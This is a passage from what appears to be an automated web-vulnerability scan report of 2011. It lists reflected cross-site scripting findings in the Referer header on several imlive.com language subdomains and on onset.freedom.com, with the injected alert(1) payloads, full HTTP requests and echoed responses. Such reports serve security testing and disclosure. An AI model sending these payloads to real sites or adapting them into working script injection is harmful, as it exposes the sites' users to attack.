Set-Cookie: spvdr=vd=e2799011-b63f-4a62-8294-050f2716e0c7&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:27 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 209339
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=mx.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=71b4f'-alert(1)-'69efbaaf3ed&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=e2799011-b63f-4a62-8294-050f2716e0c7';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1006. http://nl.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nl.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d6e9'-alert(1)-'53afcdd47c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5d6e9'-alert(1)-'53afcdd47c4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=osznmv30dz5lk1efwgosicb0; path=/; HttpOnly
Set-Cookie: pnl=; expires=Thu, 27-Jan-2011 14:25:17 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=osznmv30dz5lk1efwgosicb0; path=/; HttpOnly
Set-Cookie: pnl=; expires=Thu, 27-Jan-2011 14:25:17 GMT; path=/
Set-Cookie: spvdr=vd=7e825ee8-0af9-4f6e-ad3f-421aa265f191&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 18003
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=nl.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=5d6e9'-alert(1)-'53afcdd47c4&iy=dallas&id=44&iu=1&vd=7e825ee8-0af9-4f6e-ad3f-421aa265f191';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1007. http://nl.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nl.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c478e'-alert(1)-'b70284934ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c478e'-alert(1)-'b70284934ea

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vnk3tz55c511nzjrq4wzjm55; path=/; HttpOnly
Set-Cookie: pnl=; expires=Thu, 27-Jan-2011 14:25:23 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vnk3tz55c511nzjrq4wzjm55; path=/; HttpOnly
Set-Cookie: pnl=; expires=Thu, 27-Jan-2011 14:25:23 GMT; path=/
Set-Cookie: spvdr=vd=08345a42-5221-4393-baa8-9e58c3153060&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:23 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 219007
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=nl.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=c478e'-alert(1)-'b70284934ea&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=08345a42-5221-4393-baa8-9e58c3153060';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1008. http://no.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://no.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffa0b'-alert(1)-'f8b58c61969 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ffa0b'-alert(1)-'f8b58c61969

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=s4lpe0i25kprudjwdtqhki22; path=/; HttpOnly
Set-Cookie: pno=; expires=Thu, 27-Jan-2011 14:25:22 GMT; path=/
Set-Cookie: ASP.NET_SessionId=s4lpe0i25kprudjwdtqhki22; path=/; HttpOnly
Set-Cookie: pno=; expires=Thu, 27-Jan-2011 14:25:22 GMT; path=/
Set-Cookie: spvdr=vd=6ef62b25-e784-4359-8a09-6efa75feae6a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:22 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:22 GMT
Connection: close
Content-Length: 18139
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=no.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=ffa0b'-alert(1)-'f8b58c61969&iy=dallas&id=44&iu=1&vd=6ef62b25-e784-4359-8a09-6efa75feae6a';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1009. http://no.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://no.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a5a6'-alert(1)-'f51a024305a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7a5a6'-alert(1)-'f51a024305a

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xruybr45zgaxrtrnycfgzv55; path=/; HttpOnly
Set-Cookie: pno=; expires=Thu, 27-Jan-2011 14:25:26 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xruybr45zgaxrtrnycfgzv55; path=/; HttpOnly
Set-Cookie: pno=; expires=Thu, 27-Jan-2011 14:25:26 GMT; path=/
Set-Cookie: spvdr=vd=cc9cb5cb-4e7e-4acf-9032-0ff8302a46f4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:26 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:26 GMT
Connection: close
Content-Length: 221880
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=no.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=7a5a6'-alert(1)-'f51a024305a&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=cc9cb5cb-4e7e-4acf-9032-0ff8302a46f4';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1010. http://onset.freedom.com/fi/analytics/cms/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://onset.freedom.com
Path:	/fi/analytics/cms/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript inline comment. The payload 30512*/alert(1)//6a54575b69 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30512*/alert(1)//6a54575b69
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:50:19 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:50:19 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28760

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
:50";
s.eVar6="";
s.hier1="entertainment|root";
s.hier2="events.cbs6albany.com|entertainment|events|events|root";
/** domain=events.cbs6albany.com **/

/** referer=http://www.google.com/search?hl=en&q=30512*/alert(1)//6a54575b69 **/
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)
//if(navigator.appVersion.indexOf('MSIE')>
...[SNIP]...

4.1011. http://pu.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pu.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98560'-alert(1)-'35d8e8b408e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=98560'-alert(1)-'35d8e8b408e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=zzrb5eqoneilkk55unwnx4mi; path=/; HttpOnly
Set-Cookie: ppu=; expires=Thu, 27-Jan-2011 14:25:24 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zzrb5eqoneilkk55unwnx4mi; path=/; HttpOnly
Set-Cookie: ppu=; expires=Thu, 27-Jan-2011 14:25:24 GMT; path=/
Set-Cookie: spvdr=vd=45abd12d-aecf-4a11-8c1f-a3d2332e1d24&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:24 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:24 GMT
Connection: close
Content-Length: 20728
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=pu.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=98560'-alert(1)-'35d8e8b408e&iy=dallas&id=44&iu=1&vd=45abd12d-aecf-4a11-8c1f-a3d2332e1d24';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1012. http://pu.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pu.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e7e1'-alert(1)-'d1ec1d083c3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3e7e1'-alert(1)-'d1ec1d083c3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rl3wgs2vc24ape2prxjw5s55; path=/; HttpOnly
Set-Cookie: ppu=; expires=Thu, 27-Jan-2011 14:25:30 GMT; path=/
Set-Cookie: ASP.NET_SessionId=rl3wgs2vc24ape2prxjw5s55; path=/; HttpOnly
Set-Cookie: ppu=; expires=Thu, 27-Jan-2011 14:25:30 GMT; path=/
Set-Cookie: spvdr=vd=acc0cd69-ddd8-4967-bd19-d04833cd9756&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:30 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:29 GMT
Connection: close
Content-Length: 256741
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=pu.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=3e7e1'-alert(1)-'d1ec1d083c3&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=acc0cd69-ddd8-4967-bd19-d04833cd9756';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1013. http://ru.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ru.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48c4b'-alert(1)-'aa630895a23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=48c4b'-alert(1)-'aa630895a23

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iyyw1rvd5u5avhvh2vghiufd; path=/; HttpOnly
Set-Cookie: pru=; expires=Thu, 27-Jan-2011 14:25:25 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=iyyw1rvd5u5avhvh2vghiufd; path=/; HttpOnly
Set-Cookie: pru=; expires=Thu, 27-Jan-2011 14:25:25 GMT; path=/
Set-Cookie: spvdr=vd=ad26d161-3f29-42b1-abf6-29a32e22649c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:25 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:25 GMT
Connection: close
Content-Length: 20303
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=ru.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=48c4b'-alert(1)-'aa630895a23&iy=dallas&id=44&iu=1&vd=ad26d161-3f29-42b1-abf6-29a32e22649c';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1014. http://ru.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ru.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa18c'-alert(1)-'e132931c5dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aa18c'-alert(1)-'e132931c5dd

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=k5iln3ykxonjwn45353wpqid; path=/; HttpOnly
Set-Cookie: pru=; expires=Thu, 27-Jan-2011 14:25:30 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=k5iln3ykxonjwn45353wpqid; path=/; HttpOnly
Set-Cookie: pru=; expires=Thu, 27-Jan-2011 14:25:30 GMT; path=/
Set-Cookie: spvdr=vd=6dbc43ba-2ada-4343-a83d-39791503c1f2&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:30 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:29 GMT
Connection: close
Content-Length: 250159
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=ru.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=aa18c'-alert(1)-'e132931c5dd&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=6dbc43ba-2ada-4343-a83d-39791503c1f2';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1015. http://se.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://se.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d2d'-alert(1)-'c3f6f59e0c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=72d2d'-alert(1)-'c3f6f59e0c0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
